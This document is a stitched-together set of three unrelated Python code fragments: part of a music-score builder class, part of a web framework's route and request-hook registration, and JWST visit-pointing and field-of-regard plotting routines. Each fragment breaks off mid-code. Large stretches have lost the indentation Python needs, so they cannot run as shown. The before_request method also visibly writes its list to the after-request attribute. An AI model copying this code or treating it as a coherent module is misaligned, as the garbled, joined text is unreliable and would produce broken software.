def add_chord(self, measure_number, part_number, chord):
if not isinstance(chord, TreeChord):
raise TypeError('add_note note must be of type TreeChord not {}'.format(type(chord)))
measure = self.get_children_by_type(TreeMeasure)[measure_number - 1]
part = measure.get_children_by_type(TreePart)[part_number - 1]
part.add_chord(chord)
return chord
    def add_composer(self, text, page=None, font_size=None, default_x=None, default_y=None, justify=None, valign=None,
                     **kwargs):
        """Add a 'composer' credit with *text*, right-aligned near the top-right corner by default.

        Position defaults are derived from the page dimensions; extra kwargs are
        forwarded to CreditWords.
        """
        if not page:
            page = 1
        if not font_size:
            font_size = 12
        if not default_x:
            # 50 tenths in from the right page edge — layout constant, presumably tuned by eye
            default_x = int(self.page_style.page_width.value - 50)
        if not default_y:
            # 143 tenths down from the top page edge
            default_y = self.page_style.page_height.value - 143
        if not justify:
            justify = 'right'
        if not valign:
            valign = 'top'
        c = self.add_child(Credit(page=page))
        c.add_child(CreditType('composer'))
        self._composer = c.add_child(
            CreditWords(text, default_x=default_x, default_y=default_y, font_size=font_size, justify=justify,
                        valign=valign, **kwargs))
    def add_measure(self, measure=None):
        """Append *measure* (or a new measure inheriting the last time signature) to the score.

        A TreePart child is created in the measure for every registered score part.
        Returns the added measure.
        """
        new_measure = self._set_new_measure(measure)
        for score_part in self.get_score_parts():
            p = score_part.add_part()
            new_measure.add_child(p)
        return self.add_child(new_measure)
    def add_part(self, instrument=None):
        """Register a new score part (optionally tied to *instrument*) and back-fill a
        TreePart into every existing measure, replicating each measure's barline style."""
        new_score_part = self._generate_score_part()
        new_score_part.instrument = instrument
        self.add_score_part(new_score_part)
        for measure in self.get_children_by_type(TreeMeasure):
            part = new_score_part.add_part()
            measure.add_child(part)
            if measure.barline_style:
                bl = part.add_child(Barline())
                bl.add_child(BarStyle(measure.barline_style))
    def add_page_number(self, page=1, font_size=12, default_x=None, default_y=None, valign='top',
                        halign=None, **kwargs):
        """Add a 'page number' credit showing *page*, placed near the top outer corner.

        Even pages default to the left edge, odd pages to the right (mirrored margins).
        """
        w = self.page_style.page_width.value
        h = self.page_style.page_height.value
        if not default_x:
            if page % 2 == 0:
                default_x = int(w / 20)          # even page: 1/20 page width from the left
            else:
                default_x = w - int(w / 20)      # odd page: mirrored on the right
        if not default_y:
            default_y = h - int(h / 30)          # 1/30 page height below the top edge
        if not halign:
            if page % 2 == 0:
                halign = 'left'
            else:
                halign = 'right'
        c = self.add_child(Credit(page=page))
        c.add_child(CreditType('page number'))
        self._page_number = c.add_child(
            CreditWords(str(page), default_x=default_x, default_y=default_y, font_size=font_size,
                        valign=valign, halign=halign, **kwargs))
    def add_text(self, text, page=None, font_size=None, default_x=None, default_y=None, justify=None, valign=None,
                 **kwargs):
        """Add a free-text credit (no CreditType) with *text*, left-aligned near the top by default."""
        if not page:
            page = 1
        if not font_size:
            font_size = 12
        if not default_x:
            default_x = 50
        if not default_y:
            default_y = self.page_style.page_height.value - 143
        if not justify:
            justify = 'left'
        if not valign:
            valign = 'top'
        c = self.add_child(Credit(page=page))
        # NOTE(review): this stores the credit in self._title, clobbering any title set via
        # add_title() — looks like a copy/paste leftover (no self._text exists); confirm intent.
        self._title = c.add_child(
            CreditWords(text, default_x=default_x, default_y=default_y, font_size=font_size, justify=justify,
                        valign=valign, **kwargs))
    def add_title(self, text, page=None, font_size=None, default_x=None, default_y=None, justify=None, valign=None,
                  **kwargs):
        """Add a 'title' credit with *text*, centered near the top of the page by default."""
        if not page:
            page = 1
        if not font_size:
            font_size = 24
        if not default_x:
            default_x = int(self.page_style.page_width.value / 2)   # horizontally centered
        if not default_y:
            default_y = self.page_style.page_height.value - 43      # 43 tenths below top edge
        if not justify:
            justify = 'center'
        if not valign:
            valign = 'top'
        c = self.add_child(Credit(page=page))
        c.add_child(CreditType('title'))
        self._title = c.add_child(
            CreditWords(text, default_x=default_x, default_y=default_y, font_size=font_size, justify=justify,
                        valign=valign, **kwargs))
def add_score_part(self, score_part):
score_part.parent_score = self
return self._part_list.add_child(score_part)
    def add_subtitle(self, text, page=None, font_size=None, default_x=None, default_y=None, justify=None, valign=None,
                     **kwargs):
        """Add a 'subtitle' credit with *text*, centered below the title position by default."""
        if not page:
            page = 1
        if not font_size:
            font_size = 18
        if not default_x:
            default_x = int(self.page_style.page_width.value / 2)   # horizontally centered
        if not default_y:
            default_y = self.page_style.page_height.value - 93      # below the default title y (-43)
        if not justify:
            justify = 'center'
        if not valign:
            valign = 'top'
        c = self.add_child(Credit(page=page))
        c.add_child(CreditType('subtitle'))
        self._subtitle = c.add_child(
            CreditWords(text, default_x=default_x, default_y=default_y, font_size=font_size, justify=justify,
                        valign=valign, **kwargs))
def add_instrument(self, instrument):
if not isinstance(instrument, TreeInstrument):
raise TypeError()
self.add_part(instrument=instrument)
def add_word_font(self, **kwargs):
if self.defaults is None:
self.make_defaults()
self.defaults
# get
def get_beats(self):
output = []
for measure in self.get_children_by_type(TreeMeasure):
output.extend(measure.get_beats())
return output
def get_measure(self, number):
if number == 0:
raise ValueError('number can be positiv or negative integer but not 0')
if number < 0:
number += 1
return self.get_children_by_type(TreeMeasure)[number - 1]
def get_score_part(self, id):
for score_part in self.get_score_parts():
if score_part.id == id:
return score_part
return None
    def get_score_parts(self):
        """Return all TreeScorePart children registered in the part-list."""
        return self._part_list.get_children_by_type(TreeScorePart)
# remove
def remove_subtitle(self):
subtitle_credit = [c for c in self.get_children_by_type(Credit) if
c.get_children_by_type(CreditType)[0].value == 'subtitle']
try:
self.remove_child(subtitle_credit[0])
except IndexError:
pass
def remove_title(self):
title_credit = [c for c in self.get_children_by_type(Credit) if
c.get_children_by_type(CreditType)[0].value == 'title']
try:
self.remove_child(title_credit[0])
except IndexError:
pass
# set
def set_time_signatures(self, quarter_durations=None, times=None, barline_style=None):
global current_time
if self.get_children_by_type(TreeMeasure):
raise Exception('for setting time signatures score should be empty')
def make_measure(duration=None):
def get_time():
if duration % 1 == 0:
time = (int(duration), 4)
return time
elif (duration * 2) % 1 == 0:
time = (int(duration * 2), 8)
return time
else:
raise ValueError('duration {} is not dividable'.format(duration))
if not duration:
time = (4, 4)
else:
time = get_time()
return TreeMeasure(time)
if not times:
times = {}
current_time = (4, 4)
def set_times(current_measure_number, duration):
global current_time
duration = float(duration)
remaining_duration = duration
while True:
if current_measure_number in times.keys():
current_time = times[current_measure_number]
measure = TreeMeasure(time=current_time)
measure_duration = measure.quarter_duration
if measure_duration > remaining_duration:
measure = make_measure(duration=remaining_duration)
self.add_measure(measure)
break
else:
self.add_measure(measure)
current_measure_number += 1
remaining_duration -= measure.quarter_duration
if remaining_duration == 0:
break
if barline_style:
self.get_children_by_type(TreeMeasure)[-1].set_barline_style(barline_style)
return current_measure_number
if quarter_durations:
if not hasattr(quarter_durations, '__iter__'):
quarter_durations = [quarter_durations]
elif isinstance(quarter_durations, str):
raise TypeError()
else:
quarter_durations = quarter_durations
current_measure_number = 1
for duration in quarter_durations:
current_measure_number = set_times(current_measure_number, duration)
if list(times.keys()) != [] and current_measure_number < list(times.keys())[-1]:
current_time = (4, 4)
for key in times.keys():
if key <= current_measure_number:
current_time = times[key]
for measure_number in range(current_measure_number, list(times.keys())[-1] + 1):
try:
current_time = times[measure_number]
except KeyError:
pass
self.add_measure(TreeMeasure(time=current_time))
else:
try:
number_of_measures = list(times.keys())[-1]
current_time = (4, 4)
for measure_number in range(1, number_of_measures + 1):
try:
current_time = times[measure_number]
except KeyError:
pass
self.add_measure(TreeMeasure(time=current_time))
except IndexError:
pass
# update
    def update_accidentals(self, mode='normal'):
        """Recompute accidentals in every part of every measure using *mode*."""
        for measure in self.get_children_by_type(TreeMeasure):
            for part in measure.get_children_by_type(TreePart):
                part.update_accidentals(mode=mode)
    def update_divisions(self):
        """Recompute the MusicXML divisions value in every part of every measure."""
        for measure in self.get_children_by_type(TreeMeasure):
            for part in measure.get_children_by_type(TreePart):
                part.update_divisions()
    def update_dots(self):
        """Recompute note dots in every part of every measure."""
        for measure in self.get_children_by_type(TreeMeasure):
            for part in measure.get_children_by_type(TreePart):
                part.update_dots()
    def update_durations(self):
        """Recompute note durations in every part of every measure."""
        for measure in self.get_children_by_type(TreeMeasure):
            for part in measure.get_children_by_type(TreePart):
                part.update_durations()
    def update_measures(self):
        """Renumber all measures from 1 and show/hide their time signatures.

        force_hide/force_show win; otherwise the first measure shows its signature and
        later measures show it only when it differs from the previous measure's.
        """
        measures = self.get_children_by_type(TreeMeasure)
        for index, measure in enumerate(measures):
            measure.number = str(index + 1)
            if measure.time.force_hide:
                measure.hide_time_signature()
            elif measure.time.force_show:
                measure.show_time_signature()
            elif index == 0:
                measure.show_time_signature()
            elif measure.time.values == measures[index - 1].time.values:
                measure.hide_time_signature()
            else:
                measure.show_time_signature()
    def update_tuplets(self):
        """Recompute tuplet brackets/ratios in every part of every measure."""
        for measure in self.get_children_by_type(TreeMeasure):
            for part in measure.get_children_by_type(TreePart):
                part.update_tuplets()
def update_types(self):
for measure in self.get_children_by_type(TreeMeasure):
for | |
provide_automatic_options = getattr(
view_func, 'provide_automatic_options', None
)
if provide_automatic_options is None:
provide_automatic_options = True
else:
if not isinstance(provide_automatic_options, bool):
raise TypeError(
f'`provide_automatic_options` can be given either as `None` or `bool` instance, got '
f'{provide_automatic_options.__class__.__name__}.`'
)
if endpoint is None:
if isinstance(view_func, (Rule, RuleFolder)):
endpoint = view_func.endpoint
else:
try:
endpoint = view_func.__name__
except AttributeError:
endpoint = view_func.__class__.__name__
if type(endpoint) is str:
pass
elif isinstance(endpoint, str):
endpoint = str(endpoint)
else:
raise TypeError(
f'`endpoint` can be given as `str` instance, got {endpoint.__class__.__name__}.'
)
if type(rule) is str:
pass
elif isinstance(rule, str):
rule = str(rule)
else:
raise TypeError(
f'`rule` can be given as `str` instance, got {rule.__class__.__name__}.'
)
rule_processed = tuple(
maybe_typed_rule_part(rule_part) for rule_part in URL(rule).parts
)
if rule_processed and (rule_processed[0] == DUMMY_RULE_PART):
rule_processed = rule_processed[1:]
for parameter_type, parameter_name in rule_processed[:-1]:
if parameter_type == PARAMETER_TYPE_PATH:
raise TypeError(
f'Only last rule part can be `path` type, got {rule!r}.'
)
if provide_automatic_options:
request_methods, parameters, subdomain = _validate_options(options)
if request_methods is None:
request_methods = set()
request_methods.add(METHOD_GET)
else:
request_methods = None
parameters = None
subdomain = None
parameters = _merge_parameters(parameters, view_func_parameters)
actual_rule = self.rules.get(endpoint, None)
if actual_rule is None:
rule = Rule(
rule_processed,
real_func,
view_func_positional_parameter_names,
view_func_keyword_parameter_names,
view_func_kwargs_parameter_supported,
endpoint,
request_methods,
parameters,
subdomain,
)
self.rules[endpoint] = rule
return rule
if isinstance(actual_rule, Rule):
folder = RuleFolder.from_rule(actual_rule)
folder.add_rule(rule_processed, request_methods, parameters, subdomain)
self.rules[endpoint] = folder
return folder
# if isinstance(actual_rule, RuleFolder):
actual_rule.add_rule(rule_processed, request_methods, parameters, subdomain)
return actual_rule
def after_request(self, after_request_function):
"""
Registers an after request function. After request functions are ensured to modify the response object.
Parameters
----------
after_request_function : `async-callable`
Should accept the following parameters
+-------------------+-----------------------+-----------------------+
| Respective name | Type | Description |
+===================+=======================+=======================+
| response | ``ServerResponse`` | The response object. |
+-------------------+-----------------------+-----------------------+
Returns
-------
after_request_function : `async-callable`
Raises
------
TypeError
- If `after_request_function` was not given as `callable`.
- If `after_request_function` was not given as `async-callable`.
- If `after_request_function` accepts less or more than 1 positional parameters.
"""
_analyze_handler(after_request_function, 'after_request_function', 1)
after_request_functions = self.after_request_functions
if after_request_functions is None:
self.after_request_functions = after_request_functions = []
after_request_functions.append(after_request_function)
return after_request_function
def before_request(self, before_request_function):
"""
Registers a function which should run before a request is done.
If any before request processor returns a non `None` value, then the request processing will stop and that
return will be sent as response.
Parameters
----------
before_request_function : `async-callable`
No parameters are passed to before request functions.
Returns
-------
before_request_function : `async-callable`
Raises
------
TypeError
- If `before_request_function` was not given as `callable`.
- If `before_request_function` was not given as `async-callable`.
- If `before_request_function` accepts less or more than 1 positional parameters.
"""
_analyze_handler(before_request_function, 'before_request_function', 0)
before_request_functions = self.before_request_functions
if before_request_functions is None:
self.after_request_functions = before_request_functions = []
before_request_functions.append(before_request_function)
return before_request_function
def error_handler(self, error_code):
"""
Registers an error handler which run when an http exception is raised from a view.
Parameters
----------
error_code : `int`
Http error code.
Raises
------
TypeError
If `error_code` was not given as `int` instance.
Returns
-------
route_adder : ``_ErrorHandlerAdder``
"""
if type(error_code) is int:
pass
elif isinstance(error_code, int):
error_code = int(error_code)
else:
raise TypeError(
f'`error_code` can be given as `int` instance, got {error_code.__class__.__name__}.'
)
return _ErrorHandlerAdder(self, error_code)
def _error_handler(self, error_code, error_handler_function):
"""
Registers an error handler to the webapp. Called by ``_ErrorHandlerAdder``, what is returned by
``.error_handler``.
Parameters
----------
error_code : `int`
Http error code. Should be already validated.
error_handler_function : `async-callable`
An async function to call when an http exception is raised.
Should accept following parameters:
+-------------------+-------------------+---------------------------+
| Respective name | Type | Description |
+===================+===================+===========================+
| exception | ``AbortRequest`` | The occurred exception. |
+-------------------+-------------------+---------------------------+
Returns
-------
error_handler_function : `async-callable`
Raises
------
TypeError
- If `error_handler_function` was not given as `callable`.
- If `error_handler_function` was not given as `async-callable`.
- If `error_handler_function` accepts less or more than 1 positional parameters.
"""
_analyze_handler(error_handler_function, 'error_handler_function', 0)
error_handler_functions = self.error_handler_functions
if error_handler_functions is None:
self.error_handler_functions = error_handler_functions = {}
error_handler_functions[error_code] = error_handler_function
return error_handler_function
def url_defaults(self, url_default_function):
"""
Registers a keyword parameter processor for ``url_for``.
Parameters
----------
url_default_function : `async-callable`
Should accept the following parameters
+-------------------+---------------------------+-------------------------------------------------------+
| Respective name | type | Description |
+===================+===========================+=======================================================+
| endpoint | `None` or `str` | The endpoint what matched the request url. |
+-------------------+---------------------------+-------------------------------------------------------+
| kwargs | `dict` of (`str`, `Any`) | Additional keyword parameters passed to ``url_for``. |
+-------------------+---------------------------+-------------------------------------------------------+
Returns
-------
url_default_function : `async-callable`
Raises
------
TypeError
- If `url_default_function` was not given as `callable`.
- If `url_default_function` was not given as `async-callable`.
- If `url_default_function` accepts less or more than 2 positional parameters.
"""
_analyze_handler(url_default_function, 'url_default_function', 2)
url_default_functions = self.url_default_functions
if url_default_functions is None:
self.url_default_functions = url_default_functions = []
url_default_functions.append(url_default_function)
return url_default_function
def url_value_preprocessor(self, url_value_preprocessor):
"""
Registers a preprocessor which can modify the parameters matched from the url.
Parameters
----------
url_value_preprocessor : `async-callable`
Should accept the following parameters
+-------------------+---------------------------+-----------------------------------------------+
| Respective name | Type | Description |
+===================+===========================+===============================================+
| endpoint | `None` or `str` | The endpoint what matched the request url. |
| | | Set as `None` if exception occurred. |
+-------------------+---------------------------+-----------------------------------------------+
| parameters | `dict` of (`str`, `Any`) | Parameters parsed from the request url. |
+-------------------+---------------------------+-----------------------------------------------+
Returns
-------
url_value_preprocessor : `async-callable`
Raises
------
TypeError
- If `url_value_preprocessor` was not given as `callable`.
- If `url_value_preprocessor` was not given as `async-callable`.
- If `url_value_preprocessor` accepts less or more than 2 positional parameters.
"""
_analyze_handler(url_value_preprocessor, 'url_value_preprocessor', 2)
url_value_preprocessors = self.url_value_preprocessors
if url_value_preprocessors is None:
self.url_value_preprocessors = url_value_preprocessors = []
url_value_preprocessors.append(url_value_preprocessor)
return url_value_preprocessor
def register_blueprint(self, blueprint, **options):
"""
Registers a blueprint into the application.
Parameters
----------
parent : ``Blueprint``
The parent blueprint or webapp to register self to.
**options : Keyword parameters
Extra options to overwrite the blueprint's.
Other Parameters
----------------
url_prefix : `None` or `str`
Url prefix for a blueprint.
subdomain : `None` or `str`
Subdomain for the blueprint.
url_defaults : `None`, `dict` of (`str`, `Any`) items or (`set`, `list`, `tuple`) of (`str`, `Any`) items
Parameters which the routes of the blueprint will get by default.
Raises
------
TypeError
- If `blueprint was not given as ``Blueprint`` instance.
- If `url_prefix` was neither given as `None` or as `str` instance.
- If `url_prefix` contains a `path` rule part.
- If `subdomain` was not given neither as `None` or `str` instance.
- If `parameters` is neither `None`, `dict`, `list`, `set` or `tuple`.
- If `parameters` contains a non `tuple` element.
- If `options` contains extra parameters.
ValueError
If `parameters` contains an element with length of not `2`.
"""
blueprint_state = BlueprintState(blueprint, options)
blueprints = self.blueprints
if blueprints is None:
self.blueprints = blueprints = []
blueprints.append(blueprint_state)
class BlueprintState:
"""
Represents options with what an a blueprint is added, since a blueprint's options can be overwritten.
Attributes
----------
blueprint : ``blueprint``
The wrapped blueprint.
url_prefix : `None` or `tuple` of `tuple` (`str`, `int`)
Url prefix for all the routes of the blueprint. Set as `None` if not applicable.
subdomain : `None` or `str`
Subdomain, what the routes of the blueprint gonna match.
parameters : `None` or `tuple` of `tuple` (`str`, `Any`)
Parameters which the routes of the blueprint will get by default.
"""
__slots__ = ('blueprint', 'url_prefix', 'subdomain', 'parameters')
def __new__(cls, blueprint, options):
"""
Creates a new blueprint state form the given blueprint and extra options.
Parameters
----------
blueprint : ``AppBase``
The blueprint create overwrite state from.
options : `None` or `dict` of (`str`, `Any`) items
Extra options
Raises
------
TypeError
- If `blueprint was not given as ``Blueprint`` instance.
- If `url_prefix` was neither given as `None` or as `str` instance.
- If `url_prefix` contains a `path` rule part.
- If `subdomain` was not given neither as `None` or `str` instance.
- If `parameters` is neither `None`, `dict`, `list`, `set` or `tuple`.
- If `parameters` contains a non `tuple` element.
- If `options` contains extra parameters.
ValueError
If `parameters` contains an element with length of not `2`.
"""
if not isinstance(blueprint, Blueprint):
raise TypeError(
f'`blueprint` can | |
astropy.wcs.WCS(img_hdu[0].header)
# -- Setup plot and axes
if subplotspec is None:
plt.figure(figsize=(16, 9))
ax = plt.subplot(projection=wcs)
else:
ax = plt.subplot(subplotspec, projection=wcs)
# -- Display the 2MASS image
norm = astropy.visualization.ImageNormalize(img_hdu[0].data,
interval=astropy.visualization.PercentileInterval(99.99),
stretch=astropy.visualization.AsinhStretch(a=0.001))
plt.imshow(img_hdu[0].data, cmap='magma', norm=norm, origin='lower',
zorder=-50) # negative zorder to be below pysiaf aperture fill zorder
# use colormap to shade each visit distinctly:
cmap = matplotlib.cm.cool
for i, visit in enumerate(visitlist):
slew = visit.slew
# Compute expected V3PA
v3pa_at_gs = visit.slew.GSPA + (0 if visit._no_gspa_yoffset else fgs_aperture.V3IdlYAngle)
if slew.GUIDEMODE != 'COARSE':
raise RuntimeError("We only expect coarse point for OTE-01 mosaic tiles")
# we only have a science attitude
attmatsci = visit.get_attitude_matrix(step='slew')
gsoffset = np.zeros(2) # start with 0,0 offsets initially at start of visit
centers = []
for iact, act in enumerate(visit.activities):
if act.scriptname == 'NRCMAIN':
# Draw NIRCam apertures
for apername in visit.apertures_used():
if apername.startswith('NRS'):
continue # ignore parallel nirspec darks from NO-12
# look up aperture from that aperture name
aper_key = apername[0:4] if apername.startswith("M") else apername[
0:3] # NRC, NRS, NIS, FGS, or MIRI
aperture = SIAFS[aper_key][apername]
col = cmap(i / len(visitlist))
# plot at the correct attitude
aperture.set_attitude_matrix(attmatsci)
centers.append(aperture.sci_to_sky(1024, 1024))
aperture.plot(frame='sky', transform=ax.get_transform('icrs'),
color=col, fill_color=col, fill=True, fill_alpha=0.2)
if aperture.AperName == 'NRCA3_FULL':
c0, c1 = aperture.det_to_sky(1024, 1024)
plt.text(c0, c1, f"v{i:03d}a{iact:1d}",
color='white', transform=ax.get_transform('icrs'), horizontalalignment='left')
elif act.scriptname == 'SCSAMMAIN':
gsoffset[0] += act.FGS1DELTAX
gsoffset[1] += act.FGS1DELTAY
attmatsci = visit.get_attitude_matrix(step='slew', fgs_delta_from_sam=gsoffset)
if title:
plt.title(f"Visit file pointings for {title}")
if crop_for_no12:
# Hack: hard-coded zoom for NO-12 OTE-01 test
ax.set_xlim(424, 1024)
ax.set_ylim(150, 750)
plt.text(0.01, 0.01, "Labels show visit:activity in each NRCA3 pointing", color='white',
transform=ax.transAxes)
def plot_gs_id_references(activity_statement):
    """Plot the reference stars used during guide star identification.

    Placeholder — not yet implemented. Doing this requires converting the
    reference-star detector coordinates into sky coordinates.
    """
##--- Functions for plotting the visit field of REGARD
def plot_circle_coords(x1, x2, from_frame, to_frame, ax, **plot_kwargs):
    """Plot a circle (great or otherwise) of coordinates with astronomical frame transforms.

    Builds a SkyCoord ring in `from_frame` (degrees) and delegates the drawing,
    including the transform into `to_frame`, to ``plot_coords_in_frame``.
    """
    circle = coords.SkyCoord(x1, x2, unit='deg', frame=from_frame)
    return plot_coords_in_frame(circle, ax, to_frame, **plot_kwargs)
def plot_coords_in_frame(skycoords, ax, to_frame, **plot_kwargs):
    """Plot coordinates in ICRS/GCRS or an ecliptic frame, applying the needed transformations.

    Parameters
    ----------
    skycoords : astropy SkyCoord
        Coordinates to draw.
    ax : matplotlib axes (map projection)
        Axes to draw into.
    to_frame : str
        One of 'icrs', 'gcrs', 'geocentricmeanecliptic', 'barycentricmeanecliptic'.

    Raises
    ------
    ValueError
        If `to_frame` is not one of the supported frame names.
    """
    transformed = skycoords.transform_to(to_frame)

    # Pull out the longitude-like / latitude-like angles for the chosen frame.
    if to_frame in ('icrs', 'gcrs'):
        plot_x = transformed.ra.wrap_at('180d').radian
        plot_y = transformed.dec.radian
    elif to_frame in ('geocentricmeanecliptic', 'barycentricmeanecliptic'):
        plot_x = transformed.lon.wrap_at('180d').radian
        plot_y = transformed.lat.radian
    else:
        raise ValueError("Unsupported Frame")

    # We MUST flip the sign of X: matplotlib map projections don't let us
    # make R.A. increase to the left.
    ax.plot(-plot_x, plot_y, **plot_kwargs)
def show_field_of_regard_ecliptic(visit, datetime=None, projection='lambert', subplotspec=None, show_sun=False):
    """Plot the JWST field of regard in ecliptic coordinates.

    Sets up a sky map projection (centered on the anti-sun point for the Lambert
    projection), annotates the anti-sun point and continuous viewing zones, then
    delegates the actual marker drawing to ``plot_celestial_markers``.

    Parameters
    ----------
    visit : visit object
        Supplies the default plot time (``visit.time_early``) and target markers.
    datetime : astropy.time.Time, optional
        Time at which to evaluate the sun position; defaults to ``visit.time_early``.
    projection : str
        Matplotlib projection name; 'lambert' gets special centering and annotation.
    subplotspec : matplotlib SubplotSpec, optional
        Where to place the axes; a new subplot is created if omitted.
    show_sun : bool
        Whether to draw the sun marker itself (less useful in this projection).

    Returns
    -------
    ax : matplotlib axes
        The axes drawn into.
    """
    if datetime is None:
        # Default to the visit's earliest time.
        datetime = visit.time_early

    # Apparent sun position as seen from Earth. This may be off by up to ~0.3 deg
    # from the perspective of JWST in its large orbit around L2 — this is not a
    # high accuracy calculation.
    sun = coords.get_sun(datetime).transform_to('geocentricmeanecliptic')
    anti_sun_longitude = sun.lon.radian + np.pi

    subplot_kwargs = {'projection': projection}
    if projection == 'lambert':
        # Flip the sign on the center longitude because of the R.A. plotting convention.
        subplot_kwargs['center_longitude'] = -anti_sun_longitude

    if subplotspec is None:
        ax = plt.subplot(**subplot_kwargs)
    else:
        ax = plt.subplot(subplotspec, **subplot_kwargs)

    ax.set_xticklabels([])
    ax.grid(True)

    # Annotate the anti-sun point and both continuous viewing zones.
    if projection == 'lambert':
        plt.text(0.5, 0.55, 'anti-sun', transform=ax.transAxes, color='black', horizontalalignment='center')
        plt.text(0.5, 0.5 + 0.38, 'N CVZ', transform=ax.transAxes, color='blue')
        plt.text(0.5, 0.5 - 0.38, 'S CVZ', transform=ax.transAxes, color='blue', verticalalignment='top')

    plt.title(f"JWST field of regard\non {datetime.to_value('iso',subfmt='date')}\n[Ecliptic coords]",)

    # Draw the sun, planes, CVZs, field-of-regard shading, and target markers.
    plot_celestial_markers(visit, ax, 'geocentricmeanecliptic', show_sun=show_sun, datetime=datetime)
    return ax
def show_field_of_regard_ra_dec(visit, datetime=None, subplotspec=None, labelaxes=False):
    """Plot the celestial sphere in regular equatorial (R.A., Dec.) coordinates.

    Creates a Mollweide all-sky map, relabels its longitude axis in hours of
    right ascension, and delegates the marker drawing to ``plot_celestial_markers``.

    Parameters
    ----------
    visit : visit object
        Supplies the target markers (and default time) for the plot.
    datetime : astropy.time.Time, optional
        Time at which to evaluate the sun position.
    subplotspec : matplotlib SubplotSpec, optional
        Where to place the axes; a new subplot is created if omitted.
    labelaxes : bool
        Whether to label the R.A./Dec. axes.

    Returns
    -------
    ax : matplotlib axes
        The axes drawn into.
    """
    # Set up a map in Mollweide projection.
    if subplotspec is None:
        ax = plt.gcf().add_subplot(projection='mollweide')
    else:
        ax = plt.subplot(subplotspec, projection='mollweide')

    plt.title(f"R.A., Decl.\n[ICRS Equatorial coords]\n")
    if labelaxes:
        plt.ylabel("Declination")
        plt.xlabel("Right Ascension")

    # Replace the standard longitude ticks with R.A. in hours; the ordering includes
    # the sign flip so that R.A. increases to the left.
    plt.xticks(ticks=np.radians([-120, -60, 0, 60, 120, 180]),
               labels=['8$^h$', '4$^h$', '0$^h$', '20$^h$', '16$^h$', '12$^h$'])
    ax.grid(True)

    # Use GCRS coordinates, which is like ICRS but referenced to Earth; this only
    # matters substantially for the sun coordinates in this case.
    plot_celestial_markers(visit, ax, 'gcrs', datetime=datetime)
    return ax
def plot_celestial_markers(visit, ax, frame='gcrs', datetime=None, show_sun=True):
    """Main routine to plot celestial markers for sun, target, and various circles

    Draws, onto an existing map-projection axes:
      - the sun and anti-sun markers (sun optional via `show_sun`),
      - the galactic and ecliptic planes,
      - the JWST continuous viewing zones (CVZs) at ecliptic latitude +/-85 deg,
      - shading for the allowed field of regard around the sun,
      - the visit's guide star target and the galactic center.

    Parameters
    ----------
    visit : visit object
        Must expose ``slew.GSRA`` / ``slew.GSDEC`` in degrees and ``time_early``.
    ax : matplotlib axes
        A map-projection axes to draw into.
    frame : str
        Output frame name understood by ``plot_coords_in_frame``
        ('gcrs', 'icrs', or one of the mean-ecliptic frames).
    datetime : astropy.time.Time, optional
        Time for the sun position; defaults to ``visit.time_early``.
    show_sun : bool
        Whether to draw the sun marker itself.
    """
    if datetime is None:
        # What date/time are we generating this plot for?
        datetime = visit.time_early # astropy.time.Time.now()
    # Determine where the sun will be then.
    # NOTE - this is the apparent position as seen from Earth, and may be off by up to ~0.3 deg from the
    # perspective of JWST in its large orbit around L2. This is not a high accuracy calculation.
    sun = coords.get_sun(datetime).transform_to(frame)
    # Draw the sun, and anti-sun point
    antisun = sun.directional_offset_by(0, 180*u.deg)
    if show_sun: # it's less useful to show this in the lambert ecliptic proj
        plot_coords_in_frame(sun, ax, frame, marker='o', markersize=20, color='orange', markeredgecolor='orange', zorder=10)
    plot_coords_in_frame(antisun, ax, frame, marker='+', markersize=10, color='black', markeredgewidth=3,)
    # Draw galactic and ecliptic planes
    # JWST's CVZs are defined by the Barycentric version of the ecliptic plane.
    plot_circle_coords(np.arange(361), np.zeros(361), 'galactic', frame, ax,
                       ls='none',marker='.', markersize=2, color='maroon', alpha=0.3)
    plot_circle_coords(np.arange(361)-180, np.zeros(361), 'barycentricmeanecliptic', frame, ax,
                       ls='none',marker='.', markersize=2, color='black', alpha=0.3)
    # Draw the CVZs
    for ecliptic_lat in [85, -85]:
        plot_circle_coords(np.arange(361) - 180, np.zeros(361)+ecliptic_lat, 'barycentricmeanecliptic', frame, ax,
                           ls='none', marker='.', markersize=0.5, color='blue', alpha=0.3)
    # Shade the allowed field of regard.
    # Given hassles with plotting filled shapes in map projections, a relatively straightforward way to do this
    # ends up being to rasterize a grid over the sky, and scatter plot those points densely
    n = 180
    lat, lon = np.meshgrid(np.linspace(-np.pi, np.pi, 2 * n), np.linspace(-np.pi / 2, np.pi / 2, n))
    skymesh = astropy.coordinates.SkyCoord(lat, lon, frame=frame, unit='rad')
    # NOTE(review): `lat`, `lon` and `skymesh` are only consumed by the disabled
    # code below; the live shading uses the circle sweep that follows instead.
    #field_of_regard_mask = (seps > 85 * astropy.units.deg) & (seps < 135 * astropy.units.deg)
    pas = np.arange(360) * u.deg
    # Edges of the field of regard at 85 and 145 deg from the sun, then a sweep of
    # circles between them as fill.
    # NOTE(review): the disabled mask above used 135 deg as the outer limit while the
    # live code uses 145 — confirm which value is current.
    for offset in [85, 145]:
        for_edge = sun.directional_offset_by(pas, offset*u.deg)
        plot_coords_in_frame(for_edge, ax, frame, marker='.',color='green', markersize=1, ls='none')
    for offset in np.linspace(86, 144, 50):
        for_circ = sun.directional_offset_by(pas, offset * u.deg)
        plot_coords_in_frame(for_circ, ax, frame, marker='o', color='#E5F2E5', markersize=1, ls='none', zorder=-30)
    #
    # if 0:
    #     with warnings.catch_warnings():
    #         # Temporarily ignore any benign warnings of math errors in the following call
    #         warnings.simplefilter("ignore")
    #         # Note, must flip sight on X coord given matplotlib convention vs. RA
    #         if 'ecliptic' in frame:
    #             plt.scatter(-lat[field_of_regard_mask], lon[field_of_regard_mask], color='#E5F2E5', zorder=-1000);
    #         else:
    #             plt.scatter(-skymesh[field_of_regard_mask].ra.wrap_at('180d').radian,
    #                         skymesh[field_of_regard_mask].dec.radian, color='#E5F2E5', zorder=-1000);
    # Show the target pointing!
    gs = coords.SkyCoord(visit.slew.GSRA, visit.slew.GSDEC, unit='deg', frame='icrs')
    plot_coords_in_frame(gs, ax, frame, marker='*',color='red', markersize=20,)
    # Mark the galactic center for orientation.
    gal_center = astropy.coordinates.SkyCoord(0, 0, unit='deg', frame='galactic').transform_to('icrs')
    plot_coords_in_frame(gal_center, ax, frame, marker='o', markersize=5, color='maroon')
    # Extra markers to plot while debugging transforms
    #origin = coords.SkyCoord(0, 0, unit='deg', frame='icrs')
    #one = coords.SkyCoord(15, 0, unit='deg', frame='icrs')
    #plot_coords_in_frame(origin, ax, frame, marker='^',color='green', markersize=20,)
